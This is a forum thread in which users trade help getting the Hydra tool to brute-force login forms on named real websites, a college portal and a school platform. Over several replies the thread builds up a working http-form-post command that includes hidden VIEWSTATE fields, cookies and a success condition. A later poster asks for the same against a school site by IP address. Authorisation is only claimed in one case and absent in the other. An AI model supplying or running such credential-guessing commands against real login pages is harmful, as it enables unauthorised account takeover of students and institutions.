Forum Thread: Problem with Bruteforce Using Hydra

Hi all,

I started to learn using hydra recently and tried to brute force some web base login form which i already have access to,but after running the required command of hydra which is as follows..

hydra -l myusernae -P passwords www.bvrit.edu.in http-get-form "/default.aspx:txtId2=^USER^&txtPwd2=^PASS^:Invalid password !"

But hydra is returning all the first 15-16 passwords in the list as vaid passwords what i get after exicuting the above is

Hydra (http://www.thc.org/thc-hydra) starting at 2015-11-07 17:53:46
DATA max 16 tasks per 1 server, overall 64 tasks, 497 login tries (l:1/p:497), ~0 tries per task
DATA attacking service http-get-form on port 80
80http-get-form host: www.bvrit.edu.in login: myUsername password: prince
80http-get-form host: www.bvrit.edu.in login: myUsername password: beach
80http-get-form host: www.bvrit.edu.in login: myUsername password: porsche
80http-get-form host: www.bvrit.edu.in login: myUsername password: amateur
80http-get-form host: www.bvrit.edu.in login: myUsername password: united
80http-get-form host: www.bvrit.edu.in login: myUsername password: chelsea
80http-get-form host: www.bvrit.edu.in login: myUsername password: 12345678
80http-get-form host: www.bvrit.edu.in login: myUsername password: 7777777
80http-get-form host: www.bvrit.edu.in login: myUsername password: cool
80http-get-form host: www.bvrit.edu.in login: myUsername password: guitar
80http-get-form host: www.bvrit.edu.in login: myUsername password: great
80http-get-form host: www.bvrit.edu.in login: myUsername password: jaguar
80http-get-form host: www.bvrit.edu.in login: myUsername password: rosebud
80http-get-form host: www.bvrit.edu.in login: myUsername password: password
80http-get-form host: www.bvrit.edu.in login: myUsername password: butter
80http-get-form host: www.bvrit.edu.in login: myUsername password: firebird
1 of 1 target successfully completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-11-07 17:53:51__

whts is wrong with the code what are the modification should be made like using cookies etc any brief suggestion or explanation please...

20 Responses

One is giving "Invalid roll number !" the other "Invalid user id / password". So you might want to try just "Invalid" as a keyword. Also note there are other parameters sent in the request, so if it fails with that only modification, try to add those in the string too.

Thanks for your suggestion bro,but i had already tried using invalid and then also the same thing happens.I even tried using the id of the error code which is "lblError1" i don't know whether it would work but gave it a try and then what happend was,as it being my own id i even gave the password in the password wordlist,but inspite of giving the password hydra is giving as no valid password found and can u explain a bit briefly about using other strings in the code..

Oh wait... why are you using http-get-form when the form is sent via POST ?

sry bro,I don't know about that can u tell me what i should be using or how i should modify the code for the POST.Thank you...!!!

What you are looking for is "HTTP-FORM-POST" option, but you can know more with
man hydra
or a quick google

Thanks for your information bro,i looked into the form and u were right the method was "POST" but inspite of using this below code-

hydra -l myUsername -P passwords www.bvrit.edu.in http-form-post "/default.aspx:txtId2=^USER^&txtPwd2=^PASS^:Invalid"

sorry to say this but the same thing happens and i will look into "MAN HYDRA",thank u again in between...

You just made a step forward in finding the solution..

Now try using a request with the full VIEWSTATE, VIEWSTATEGENERATOR, EVENTVALIDATION parameters... maybe they are needed to complete the request, maybe they are dynamically generated each page load... who knows.. you have to find out !

Also, you might consider REDACTING your used id in your posts if that's your real one. You know... privacy is still a thing.

Once again thanks for all your informaion bro and can you just drop in some tutorials or examples of how to use VIEWSTATE, VIEWSTATEGENERATOR, EVENTVALIDATION parameters... as i have no idea of it....and even googling it also had not given any good result.

and thanks for your suggestion of REDACTION my id and ill do it...

Those are just parameters sent along with your POST request. You won't find anything on google about them because they have no meaning to the world, besides that only website that is using them.

Just keep reloading the site and note down if those parameters change. If they don't, just add them to the hydra cmd line.

hydra -l XXXXXXXX -P passwords www.bvrit.edu.in http-form-post "/default.aspx:_VIEWSTATE=XXXXXXXXXXXXXXX&_VIEWSTATEGENERATOR=XXXXXXXXX&_EVENTVALIDATION=XXXXXXXXXXXX&txtId1=&txtPwd1=&txtId2=^USER^&txtPwd2=^PASS^&imgBtn2.x=17&imgBtn2.y=18:Invalid"

If they do change every page reload, you have to figure out how those are created

Sorry to annoy you bro but where can we look up for them.i can't find any such parameters in inspect element or any other place etc..

sorry to annoy you but can you give a brief explanation of using it.As even there is no google to look up for help.
cheers bro...!!!!

Those are 'hidden' fields, so in the source you have to look for something like <input type="hidden" name="_VIEWSTATEGENERATOR" ... they are right after the main <form tag.

If you are using kali:

  1. go to the web page,
  2. right click > inspect element
  3. go to "network" tab at bottom of page
  4. press the "login" button on page
  5. you will see a "post" request on bottom of page, click on it
  6. a right panel will show on bottom page
  7. Click "edit and resend"
  8. watch the 'request headers' section, and possibly add those headers (this is something you can google) like "Referer" and proper "user-agent", sometimes they are required to succesfull autentication
  9. watch the 'request body' to get full list of informations sent via post request.

This is a step-by-step. So if something goes wrong, just look closer, it's all in here plus a little googling on how to send additional headers with hydra.

Thanks a lot bro for all your time and help,

The VIEW STATE GENERATORS,VIEW STATE are changing but iam trying to send additional headers like as you mentioned REFERER etc..

You made my day bro...Thanks for all your help .I figured out the correct way to bruteforce it,i included all the VIEWSTATE etc,and also cookies and the following command worked perfectly,But i had used a counter as a sucessful attempt using "S" and not an invalid attempt,the code which finally worked is..

hydra -l username -P passwords www.bvrit.edu.in http-form-post -v -V "/default.aspx:_VIEWSTATE=XXXXXX&_VIEWSTATEGENERATOR=XXXXX&_EVENTVALIDATION=XXXXXXtxtId1=&txtPwd1=&txtId2=^USER^&txtPwd2=^PASS^&imgBtn2.x=40&imgBtn2.y=9:S=StudentMaster.aspx:H=Cookie: ASP.NETSessionId=XXXXXXXX;

Glad to hear I helped you. Hope this helps other people too in finding how to make custom bruteforce for non-standard websites.

Triphat, thank you so much, I have a similar case, but my parameters are: EVENTTARGET ( with value="")
EVENTARGUMENT (also value="")
VIEWSTATE (which has a long value=XXXXXXXXXX)
so what should I do in this case?
thanks in advance buddy, you're awesome

also, would you please tell me how can I contact you? in the settings the WonderHowTo says: To start a new private conversation with someone, browse to their profile and click the message button

but there's nothing in any profiles !! just the name of the person !!
could you please give me an email to contact you?
thanks again mate :)

PMing is currently down on the site, but we're working to bring this feature back.

wow man, if you can do all of these stuff, why need you help people?
actually (with all respect) I don't believe some of your words!

for example, there's nothing called 100% guaranteed security, even the white house system has been hacked by some Russian hackers!

never mind, so, please if you have an answer to my question I'll appreciate it :)
thanks in advance ..

Justin Mayers, why did you edit your comment?
don't you trust what you offer to others !!
or your offers are no longer available ?
give it back, you might find someone interested :)

Hi I was hoping I could also have some help with my THC Hydra code. So far my code is :

hydra -l user -P /root/Documents/pass1.txt 217.179.43.64 http-post-form "/frog.cleeveschool.net:username=^USER^&password=^PASS^&Login:Incorrect username and password combination"

The problem is that Hydra accepts all the passwords in the password file which means I think I got some of the parameters wrong . Could anyone help me by giving me what the code should look like for this website. Sorry I'm new at using this software.

website: frog.cleeveschool.net

Many Thanks

Share Your Thoughts

  • Hot
  • Active